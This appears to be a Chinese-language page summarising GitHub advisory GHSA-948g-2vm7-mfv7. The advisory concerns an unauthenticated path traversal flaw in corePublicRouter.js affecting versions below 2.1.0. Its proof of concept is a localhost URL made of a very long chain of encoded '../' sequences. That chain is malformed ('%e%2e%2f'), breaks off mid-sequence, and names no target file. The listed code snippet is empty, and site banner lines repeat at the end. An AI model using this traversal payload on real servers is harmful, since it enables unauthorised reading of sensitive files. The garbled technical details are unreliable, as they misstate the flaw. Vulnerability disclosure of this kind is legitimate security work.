GHSA-948g-2vm7-mfv7: 路径遍历漏洞读取敏感数据

从这个网页截图中，可以获取到以下关于漏洞的关键信息： 1. 漏洞描述： - 标题：Path Traversal (unauthenticated user can read sensitive data) - 严重性：High - 发布者：salahlalami - 发布时间：2天前 - 漏洞编号：GHSA-948g-2vm7-mfv7 - 描述：发现了一个路径遍历漏洞，允许未授权用户读取敏感数据。 - 受影响版本：<2.1.0 - 已修复版本：无 2. 代码示例： - 文件：corePublicRouter.js - 代码行：43 - 代码片段： 3. 漏洞利用： - PoC： - 使用docker部署应用 - 访问URL：http://localhost:8888/public/%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e%2e%2f%e

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

GHSA-948g-2vm7-mfv7: 路径遍历漏洞读取敏感数据

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

GHSA-948g-2vm7-mfv7: 路径遍历漏洞读取敏感数据

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！